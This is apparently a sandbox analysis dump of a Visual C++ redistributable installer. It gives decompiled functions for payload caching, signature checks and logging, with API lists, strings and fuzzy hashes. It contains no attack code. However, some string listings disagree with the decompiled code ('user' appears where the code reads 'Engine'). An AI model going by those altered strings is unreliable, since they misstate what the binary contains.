                                                                          								_push(_t32);
                                                                          								_push(_t37);
                                                                          								_t40 = E00053FE7();
                                                                          								__eflags = _t40;
                                                                          								if(_t40 < 0) {
                                                                          									_push(_t32);
                                                                          									_push(_t37);
                                                                          									_push("Failed to copy %ls to %ls");
                                                                          									goto L17;
                                                                          								}
                                                                          							} else {
                                                                          								_push(1);
                                                                          								_push(_t32);
                                                                          								_push(_t37);
                                                                          								_t40 = E000541D1();
                                                                          								__eflags = _t40;
                                                                          								if(_t40 < 0) {
                                                                          									_push(_t32);
                                                                          									_push(_t37);
                                                                          									_push("Failed to move %ls to %ls");
                                                                          									L17:
                                                                          									_push(_t40);
                                                                          									E0005012F();
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_push(_a8);
                                                                          							_push("Failed to verify payload signature: %ls");
                                                                          							L6:
                                                                          							_push(_t40);
                                                                          							E0005012F();
                                                                          						}
                                                                          					}
                                                                          					CloseHandle(_a12);
                                                                          				} else {
                                                                          					_t27 = GetLastError();
                                                                          					_t43 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          					_t40 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "cache.cpp", 0x56b, _t40);
                                                                          					E0005012F(_t40, "Failed to open payload in working path: %ls", _t37);
                                                                          				}
                                                                          				return _t40;
                                                                          			}













                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,0002A63D,?,00000000,?,?,0003B049), ref: 000295C7
                                                                          • GetLastError.KERNEL32(?,0002A63D,?,00000000,?,?,0003B049,?,00000000,?,00000000,?,?,0003B049,?), ref: 000295D7
                                                                          • CloseHandle.KERNEL32(?,0003B049,00000001,00000003,000007D0,?,?,0003B049,?), ref: 000296E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: %ls payload from working path '%ls' to path '%ls'$@Met$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                          • API String ID: 2528220319-789942400
                                                                          • Opcode ID: 89669a3105e4a331a0d91a2f97813fb533e756b7e411beccb2d3a13d525a9e22
                                                                          • Instruction ID: 5e8ee20b28c74bc41188ff303d0c376bf5d07d21380455b3f90a612bb3f579f5
                                                                          • Opcode Fuzzy Hash: 89669a3105e4a331a0d91a2f97813fb533e756b7e411beccb2d3a13d525a9e22
                                                                          • Instruction Fuzzy Hash: 6D31D471A407357BEB311A26AC0AFAF3A9DDF42F55F010219FD09BF292D6619D0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E00017E7C(void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				char _v24;
                                                                          				intOrPtr _v28;
                                                                          				char _v32;
                                                                          				struct _CRITICAL_SECTION* _t58;
                                                                          				char* _t59;
                                                                          				char* _t60;
                                                                          				intOrPtr _t68;
                                                                          				void* _t70;
                                                                          				char* _t75;
                                                                          				void* _t76;
                                                                          				char* _t87;
                                                                          				void* _t93;
                                                                          				signed int _t96;
                                                                          				void* _t97;
                                                                          				void* _t101;
                                                                          				void* _t102;
                                                                          				void* _t105;
                                                                          				intOrPtr _t106;
                                                                          				intOrPtr* _t110;
                                                                          				void* _t113;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				asm("movlpd [ebp-0x14], xmm0");
                                                                          				asm("movlpd [ebp-0x1c], xmm0");
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t113 = E0004F7B2(_a12, _a16,  *((intOrPtr*)(_a4 + 0x1c)));
                                                                          				if(_t113 >= 0) {
                                                                          					_t58 = _a4;
                                                                          					_v12 = _v12 & 0x00000000;
                                                                          					if( *((intOrPtr*)(_t58 + 0x1c)) <= 0) {
                                                                          						L45:
                                                                          						LeaveCriticalSection(_t58);
                                                                          						_t105 = 8;
                                                                          						_t97 = _t105;
                                                                          						_t59 =  &_v24;
                                                                          						do {
                                                                          							 *_t59 = 0;
                                                                          							_t59 = _t59 + 1;
                                                                          							_t97 = _t97 - 1;
                                                                          						} while (_t97 != 0);
                                                                          						_t60 =  &_v32;
                                                                          						do {
                                                                          							 *_t60 = 0;
                                                                          							_t60 = _t60 + 1;
                                                                          							_t105 = _t105 - 1;
                                                                          						} while (_t105 != 0);
                                                                          						E00012793(_v8);
                                                                          						return _t113;
                                                                          					}
                                                                          					_t106 = 0;
                                                                          					_v16 = 0;
                                                                          					do {
                                                                          						_t110 =  *((intOrPtr*)(_a4 + 0x20)) + _t106;
                                                                          						if(_a8 != 0) {
                                                                          							if( *((intOrPtr*)(_t110 + 0x28)) == 0) {
                                                                          								L6:
                                                                          								_t93 = 0;
                                                                          								L7:
                                                                          								_t113 = E0004F7B2(_a12, _a16, _t93);
                                                                          								if(_t113 < 0) {
                                                                          									_push("Failed to write included flag.");
                                                                          									L43:
                                                                          									_push(_t113);
                                                                          									E0005012F();
                                                                          									_t58 = _a4;
                                                                          									L44:
                                                                          									goto L45;
                                                                          								}
                                                                          								if(_t93 == 0) {
                                                                          									goto L31;
                                                                          								}
                                                                          								_t95 = _a16;
                                                                          								_t113 = E0004F7E0(_t96, _a12, _a16,  *_t110);
                                                                          								if(_t113 < 0) {
                                                                          									_push("Failed to write variable name.");
                                                                          									goto L43;
                                                                          								}
                                                                          								_t113 = E0004F7B2(_a12, _t95,  *((intOrPtr*)(_t110 + 0x18)));
                                                                          								if(_t113 < 0) {
                                                                          									_push("Failed to write variable value type.");
                                                                          									goto L43;
                                                                          								}
                                                                          								_t68 =  *((intOrPtr*)(_t110 + 0x18));
                                                                          								if(_t68 == 0) {
                                                                          									L30:
                                                                          									_t113 = E0004F7B2(_a12, _t95,  *((intOrPtr*)(_t110 + 0x24)));
                                                                          									if(_t113 < 0) {
                                                                          										_push("Failed to write literal flag.");
                                                                          										goto L43;
                                                                          									}
                                                                          									goto L31;
                                                                          								}
                                                                          								_t70 = _t68 - 1;
                                                                          								if(_t70 == 0) {
                                                                          									_t113 = E0003006A(_t96, _t110 + 8,  &_v24);
                                                                          									if(_t113 < 0) {
                                                                          										_push("Failed to get numeric.");
                                                                          										goto L43;
                                                                          									}
                                                                          									_t113 = E0004F77D(_a12, _t95, _v24, _v20);
                                                                          									if(_t113 < 0) {
                                                                          										L33:
                                                                          										_push("Failed to write variable value as number.");
                                                                          										goto L43;
                                                                          									}
                                                                          									_t101 = 8;
                                                                          									_t75 =  &_v24;
                                                                          									do {
                                                                          										 *_t75 = 0;
                                                                          										_t75 = _t75 + 1;
                                                                          										_t101 = _t101 - 1;
                                                                          									} while (_t101 != 0);
                                                                          									goto L30;
                                                                          								}
                                                                          								_t76 = _t70 - 1;
                                                                          								if(_t76 == 0) {
                                                                          									_t113 = E000300E0(_t110 + 8,  &_v8);
                                                                          									if(_t113 < 0) {
                                                                          										_push("Failed to get string.");
                                                                          										goto L43;
                                                                          									}
                                                                          									_t113 = E0004F7E0(_t96, _a12, _t95, _v8);
                                                                          									if(_t113 < 0) {
                                                                          										_push("Failed to write variable value as string.");
                                                                          										goto L43;
                                                                          									}
                                                                          									if(_v8 != 0) {
                                                                          										E00012793(_v8);
                                                                          										_v8 = _v8 & 0x00000000;
                                                                          									}
                                                                          									goto L30;
                                                                          								}
                                                                          								if(_t76 != 1) {
                                                                          									_t113 = 0x80070057;
                                                                          									_push("Unsupported variable type.");
                                                                          									goto L43;
                                                                          								}
                                                                          								_t113 = E000301D0(_t96, _t106, _t110 + 8,  &_v32);
                                                                          								if(_t113 < 0) {
                                                                          									_push("Failed to get version.");
                                                                          									goto L43;
                                                                          								}
                                                                          								_t113 = E0004F77D(_a12, _t95, _v32, _v28);
                                                                          								if(_t113 < 0) {
                                                                          									goto L33;
                                                                          								}
                                                                          								_t102 = 8;
                                                                          								_t87 =  &_v32;
                                                                          								do {
                                                                          									 *_t87 = 0;
                                                                          									_t87 = _t87 + 1;
                                                                          									_t102 = _t102 - 1;
                                                                          								} while (_t102 != 0);
                                                                          								goto L30;
                                                                          							}
                                                                          							L21:
                                                                          							_t93 = 1;
                                                                          							goto L7;
                                                                          						}
                                                                          						if( *((intOrPtr*)(_t110 + 0x2c)) != 2) {
                                                                          							goto L21;
                                                                          						}
                                                                          						goto L6;
                                                                          						L31:
                                                                          						_t58 = _a4;
                                                                          						_t96 = _v12 + 1;
                                                                          						_t106 = _v16 + 0x38;
                                                                          						_v12 = _t96;
                                                                          						_v16 = _t106;
                                                                          					} while (_t96 <  *((intOrPtr*)(_t58 + 0x1c)));
                                                                          					goto L44;
                                                                          				}
                                                                          				_push("Failed to write variable count.");
                                                                          				_push(_t113);
                                                                          				E0005012F();
                                                                          				_t58 = _a4;
                                                                          				goto L45;
                                                                          			}


                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000), ref: 00017E99
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?), ref: 000180C1
                                                                          Strings
                                                                          • Failed to write variable count., xrefs: 00017EB4
                                                                          • Failed to get numeric., xrefs: 00018093
                                                                          • Failed to write variable value as number., xrefs: 0001806B
                                                                          • Failed to get string., xrefs: 0001808C
                                                                          • Failed to write variable value type., xrefs: 000180A1
                                                                          • Failed to write variable value as string., xrefs: 00018085
                                                                          • Failed to write literal flag., xrefs: 0001809A
                                                                          • Failed to write variable name., xrefs: 000180A8
                                                                          • Failed to write included flag., xrefs: 000180AF
                                                                          • Failed to get version., xrefs: 00018072
                                                                          • Unsupported variable type., xrefs: 0001807E
                                                                          • feclient.dll, xrefs: 00017F74, 00017FCA, 0001800B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                                          • API String ID: 3168844106-2118673349
                                                                          • Opcode ID: 135febdb1129470567d69e3897331c0362fa2a1ed36b05b9bc17bdb7b93d65ae
                                                                          • Instruction ID: b84071857df201557aa70143e4a8310475cdb11a47fa2fd206837311801f8b5d
                                                                          • Opcode Fuzzy Hash: 135febdb1129470567d69e3897331c0362fa2a1ed36b05b9bc17bdb7b93d65ae
                                                                          • Instruction Fuzzy Hash: 5D61B23680461EAFCBA39E64C840BEF7BA5FF08355F118162FE0067191CB31DE989B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E0002EDFE(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                          				char _v8;
                                                                          				long _t23;
                                                                          				signed short _t43;
                                                                          				long _t53;
                                                                          				intOrPtr* _t63;
                                                                          				intOrPtr _t66;
                                                                          				void* _t67;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_v8 = 0;
                                                                          				_t23 = E000138D4(0x14, 1);
                                                                          				_t66 = _a4;
                                                                          				_t53 = _t23;
                                                                          				EnterCriticalSection( *(_t66 + 0xc));
                                                                          				_t57 =  *(_t66 + 0xc) + 0xb8;
                                                                          				_t67 = E0001D459( *(_t66 + 0xc) + 0xb8);
                                                                          				if(_t67 >= 0) {
                                                                          					_t63 = _a12;
                                                                          					if(_t63 == 0 ||  *_t63 == 0) {
                                                                          						_t67 = 0x80070057;
                                                                          						goto L15;
                                                                          					} else {
                                                                          						_t67 = E0001C780(_t57,  *(_a4 + 0xc) + 0x3d8, _t63,  &_v8);
                                                                          						if(_t67 >= 0) {
                                                                          							LeaveCriticalSection( *(_a4 + 0xc));
                                                                          							_t11 = _t53 + 4; // 0x4
                                                                          							_t67 = E000121A5(_t11, _t63, 0);
                                                                          							if(_t67 >= 0) {
                                                                          								if(_a16 == 0) {
                                                                          									L12:
                                                                          									 *((intOrPtr*)(_t53 + 0x10)) = _a20;
                                                                          									 *_t53 = _a8;
                                                                          									if(PostThreadMessageW( *(_a4 + 0x10), 0x9004, 0, _t53) == 0) {
                                                                          										_t43 = GetLastError();
                                                                          										_t71 =  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
                                                                          										_t67 =  >=  ? 0x80004005 :  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
                                                                          										E000137D3(0x80004005, "EngineForApplication.cpp", 0x2f5, _t67);
                                                                          										_push("Failed to post launch approved exe message.");
                                                                          										goto L8;
                                                                          									}
                                                                          								} else {
                                                                          									_t14 = _t53 + 0xc; // 0xc
                                                                          									_t67 = E000121A5(_t14, _a16, 0);
                                                                          									if(_t67 >= 0) {
                                                                          										goto L12;
                                                                          									} else {
                                                                          										_push("Failed to copy the arguments.");
                                                                          										goto L8;
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to copy the id.");
                                                                          								L8:
                                                                          								_push(_t67);
                                                                          								E0005012F();
                                                                          							}
                                                                          						} else {
                                                                          							E0005012F(_t67, "UX requested unknown approved exe with id: %ls", _t63);
                                                                          							goto L15;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Engine is active, cannot change engine state.");
                                                                          					_push(_t67);
                                                                          					E0005012F();
                                                                          					L15:
                                                                          					LeaveCriticalSection( *(_a4 + 0xc));
                                                                          				}
                                                                          				if(_t67 < 0) {
                                                                          					E0001BF5C(_t53);
                                                                          				}
                                                                          				return _t67;
                                                                          			}











                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 0002EE1B
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0002EF48
                                                                          Strings
                                                                          • Failed to copy the id., xrefs: 0002EEAD
                                                                          • UX requested unknown approved exe with id: %ls, xrefs: 0002EE7B
                                                                          • userForApplication.cpp, xrefs: 0002EF29
                                                                          • user is active, cannot change user state., xrefs: 0002EE36
                                                                          • Failed to post launch approved exe message., xrefs: 0002EF33
                                                                          • Failed to copy the arguments., xrefs: 0002EEDA
                                                                          • @Met, xrefs: 0002EF05
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                          • String ID: @Met$user is active, cannot change user state.$userForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                          • API String ID: 1367039788-170774163
                                                                          • Opcode ID: 01af31e6c9e9986c7084ab3d73ed12509fc5a629124e809e92d92a4268436fe2
                                                                          • Instruction ID: 32cdad34286fff95065ff3a7548f9e55a772e172a2068fde9be0f82a157a49cc
                                                                          • Opcode Fuzzy Hash: 01af31e6c9e9986c7084ab3d73ed12509fc5a629124e809e92d92a4268436fe2
                                                                          • Instruction Fuzzy Hash: 9B31E332A80375ABEB61AF24EC45EAB37E8EF04720B054025FD08EB291DB31DD4087A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,0002A5CE,?,00000000,?,?,0003B041), ref: 000294B1
                                                                          • GetLastError.KERNEL32(?,0002A5CE,?,00000000,?,?,0003B041,?,00000000,?,00000000,?,?,0003B041,?), ref: 000294BF
                                                                          • CloseHandle.KERNEL32(?,0003B041,00000001,00000003,000007D0,?,?,0003B041,?), ref: 0002959E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: %ls container from working path '%ls' to path '%ls'$@Met$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                          • API String ID: 2528220319-2304174599
                                                                          • Opcode ID: 8768c270190c74847b9c7d1b5126f80a0c694856c27fe6823de94e3e1ce81b15
                                                                          • Instruction ID: e24ca1f299cbf016d3c4617723adcfdf147235ea6ca81fccb4e2b5f088eeec2b
                                                                          • Opcode Fuzzy Hash: 8768c270190c74847b9c7d1b5126f80a0c694856c27fe6823de94e3e1ce81b15
                                                                          • Instruction Fuzzy Hash: 37210572B80B347BF7222A299C46FAF365DDF52B55F000119FE09BE2C2D2A19D1086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 77%
                                                                          			E00023E47(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				char _v8;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				intOrPtr* _t46;
                                                                          				intOrPtr* _t47;
                                                                          				intOrPtr* _t51;
                                                                          				intOrPtr* _t55;
                                                                          				intOrPtr _t73;
                                                                          				intOrPtr* _t82;
                                                                          				intOrPtr* _t83;
                                                                          				signed char* _t87;
                                                                          				intOrPtr _t101;
                                                                          				intOrPtr* _t103;
                                                                          				char _t106;
                                                                          
                                                                          				_t90 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_t103 = _a4;
                                                                          				_t106 = 0;
                                                                          				_v8 = 0;
                                                                          				_t87 = _t103 + 8;
                                                                          				E00023955(_t87, __ecx, _t103, 0, _t87);
                                                                          				if(( *_t87 & 0x00000006) == 0) {
                                                                          					L11:
                                                                          					_t101 = 0;
                                                                          					L12:
                                                                          					_t88 = _t103 + 0xc;
                                                                          					_t46 =  *(_t103 + 0xc);
                                                                          					if(_t46 == 0 ||  *_t46 == _t101) {
                                                                          						_t47 =  *((intOrPtr*)(_t103 + 0x10));
                                                                          						if(_t47 == 0 ||  *_t47 == _t101) {
                                                                          							E0005006B();
                                                                          							goto L38;
                                                                          						} else {
                                                                          							_t106 = E000239FD(_t101, _t103,  &_v8);
                                                                          							if(_t106 >= 0) {
                                                                          								_t106 = E0005041B(_t90, _t101, _t103, _v8,  *((intOrPtr*)(_t103 + 0x10)), 0,  *((intOrPtr*)(_t103 + 0x14)), 0, 0, _t88);
                                                                          								if(_t106 >= 0) {
                                                                          									goto L36;
                                                                          								}
                                                                          								E0005006B();
                                                                          								_t106 = 0;
                                                                          								L38:
                                                                          								 *_t103 = 2;
                                                                          								goto L39;
                                                                          							}
                                                                          							_push("Failed to get non-session specific TEMP folder.");
                                                                          							goto L16;
                                                                          						}
                                                                          					} else {
                                                                          						_a4 = _t101;
                                                                          						_t106 = E0001410D(_t90,  &_v8);
                                                                          						if(_t106 >= 0) {
                                                                          							_t73 = _a4;
                                                                          							do {
                                                                          								if(_t73 != 0) {
                                                                          									Sleep(0x7d0);
                                                                          								}
                                                                          								_t106 = E0005041B(0, _t101, _t103, _v8,  *_t88, 0, 0,  *(_t103 + 8) & 0x00000001, 0, _t88);
                                                                          								_t73 = _a4;
                                                                          								if(( *(_t103 + 8) & 0x00000001) != 0 && _t106 == 0x80070020) {
                                                                          									_t73 = _t73 + 1;
                                                                          									_a4 = _t73;
                                                                          								}
                                                                          							} while (_t73 != 0 && _t73 <= 3);
                                                                          							if(_t106 >= 0) {
                                                                          								L36:
                                                                          								 *_t103 = 1;
                                                                          								L39:
                                                                          								if( *_t103 != 1) {
                                                                          									L51:
                                                                          									if(_v8 != 0) {
                                                                          										E000554EF(_v8);
                                                                          									}
                                                                          									return _t106;
                                                                          								}
                                                                          								_t51 = E000132F1( *_t88);
                                                                          								_a4 = _t51;
                                                                          								if(_t51 == 0 ||  *_t51 == 0) {
                                                                          									_t106 = E000121A5(_t103 + 0x10,  *_t88, 0);
                                                                          									if(_t106 >= 0) {
                                                                          										goto L48;
                                                                          									}
                                                                          									_push("Failed to copy full log path to prefix.");
                                                                          								} else {
                                                                          									_t106 = E000121A5(_t103 + 0x10,  *_t88, _t51 -  *_t88 >> 1);
                                                                          									if(_t106 >= 0) {
                                                                          										_t106 = E000121A5(_t103 + 0x14, _a4 + 2, 0);
                                                                          										if(_t106 >= 0) {
                                                                          											L48:
                                                                          											_t55 =  *((intOrPtr*)(_t103 + 4));
                                                                          											if(_t55 != 0 &&  *_t55 != 0) {
                                                                          												E00018197(_a8, _t55,  *_t88, 0);
                                                                          											}
                                                                          											goto L51;
                                                                          										}
                                                                          										_push("Failed to copy log extension to extension.");
                                                                          										L16:
                                                                          										_push(_t106);
                                                                          										E0005012F();
                                                                          										goto L51;
                                                                          									}
                                                                          									_push("Failed to copy log path to prefix.");
                                                                          								}
                                                                          								goto L16;
                                                                          							}
                                                                          							E0005006B();
                                                                          							 *_t103 = 2;
                                                                          							if(( *(_t103 + 8) & 0x00000001) == 0) {
                                                                          								_a4 = _t106;
                                                                          								_t106 = 0x80070656;
                                                                          								E0002E4F4(0, _a12, _a16, 0x80070656);
                                                                          								_t79 = _a4;
                                                                          								if(_a4 >= 0) {
                                                                          									goto L39;
                                                                          								}
                                                                          								E0005012F(_t79, "Failed to open log: %ls",  *_t88);
                                                                          								goto L51;
                                                                          							}
                                                                          							_t106 = 0;
                                                                          							goto L39;
                                                                          						}
                                                                          						_push("Failed to get current directory.");
                                                                          						goto L16;
                                                                          					}
                                                                          				}
                                                                          				if(( *_t87 & 0x00000004) == 0) {
                                                                          					if(( *_t87 & 0x00000002) == 0) {
                                                                          						L6:
                                                                          						_t90 = _t103 + 0xc;
                                                                          						_t101 = 0;
                                                                          						_t82 =  *((intOrPtr*)(_t103 + 0xc));
                                                                          						if(_t82 == 0 ||  *_t82 == 0) {
                                                                          							_t83 =  *((intOrPtr*)(_t103 + 0x10));
                                                                          							if(_t83 == 0 ||  *_t83 == _t101) {
                                                                          								E00012DE0(_t90, _t101, L"Setup", _t101, L"log", _t90, _t101);
                                                                          								goto L11;
                                                                          							} else {
                                                                          								goto L12;
                                                                          							}
                                                                          						} else {
                                                                          							goto L12;
                                                                          						}
                                                                          					}
                                                                          					_push(0);
                                                                          					_push(3);
                                                                          					L5:
                                                                          					E000505A2();
                                                                          					goto L6;
                                                                          				}
                                                                          				_push(0);
                                                                          				_push(4);
                                                                          				goto L5;
                                                                          			}


















                                                                          0x00024095
                                                                          0x00023fef
                                                                          0x00023ff4
                                                                          0x00023ff9
                                                                          0x00024055
                                                                          0x00024059
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002405b
                                                                          0x00024002
                                                                          0x00024014
                                                                          0x00024018
                                                                          0x00024037
                                                                          0x0002403b
                                                                          0x00024065
                                                                          0x00024065
                                                                          0x0002406a
                                                                          0x0002407a
                                                                          0x0002407a
                                                                          0x00000000
                                                                          0x0002406a
                                                                          0x0002403d
                                                                          0x00023edf
                                                                          0x00023edf
                                                                          0x00023ee0
                                                                          0x00000000
                                                                          0x00023ee6
                                                                          0x0002401a
                                                                          0x0002401a
                                                                          0x00000000
                                                                          0x00023ff9
                                                                          0x00023f3d
                                                                          0x00023f46
                                                                          0x00023f4c
                                                                          0x00023f57
                                                                          0x00023f5a
                                                                          0x00023f66
                                                                          0x00023f6b
                                                                          0x00023f70
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00023f7a
                                                                          0x00000000
                                                                          0x00023f7f
                                                                          0x00023f50
                                                                          0x00000000
                                                                          0x00023f50
                                                                          0x00023eda
                                                                          0x00000000
                                                                          0x00023eda
                                                                          0x00023eb9
                                                                          0x00023e69
                                                                          0x00023e75
                                                                          0x00023e81
                                                                          0x00023e81
                                                                          0x00023e84
                                                                          0x00023e86
                                                                          0x00023e8a
                                                                          0x00023e91
                                                                          0x00023e96
                                                                          0x00023eab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00023e8a
                                                                          0x00023e79
                                                                          0x00023e7a
                                                                          0x00023e7c
                                                                          0x00023e7c
                                                                          0x00000000
                                                                          0x00023e7c
                                                                          0x00023e6d
                                                                          0x00023e6e
                                                                          0x00000000

                                                                          APIs
                                                                            • Part of subcall function 00023955: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00023E61,feclient.dll,?,00000000,?,?,?,00014A0C), ref: 000239F1
                                                                          • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00014A0C,?,?,0005B478,?,00000001,00000000,00000000), ref: 00023EF8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseSleep
                                                                          • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                          • API String ID: 2834455192-2673269691
                                                                          • Opcode ID: 03e92e14c4cbe8b3d011a184bf372992e0ca2b942217792fa5f377a3895336ca
                                                                          • Instruction ID: 9207d420c21c3dc04a63af2fdeefb84f51412f25dcb5fc7ba516f47151b176df
                                                                          • Opcode Fuzzy Hash: 03e92e14c4cbe8b3d011a184bf372992e0ca2b942217792fa5f377a3895336ca
                                                                          • Instruction Fuzzy Hash: 6A61E271A00635BBDF629F24EC46BABB6E8EF04300B054165FD01DB182E775EE9487A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 89%
                                                                          			E00022A60(signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int* _a24) {
                                                                          				char _v8;
                                                                          				int _v12;
                                                                          				char _v16;
                                                                          				int _v20;
                                                                          				intOrPtr* _v24;
                                                                          				void* __edi;
                                                                          				int _t107;
                                                                          				signed int _t109;
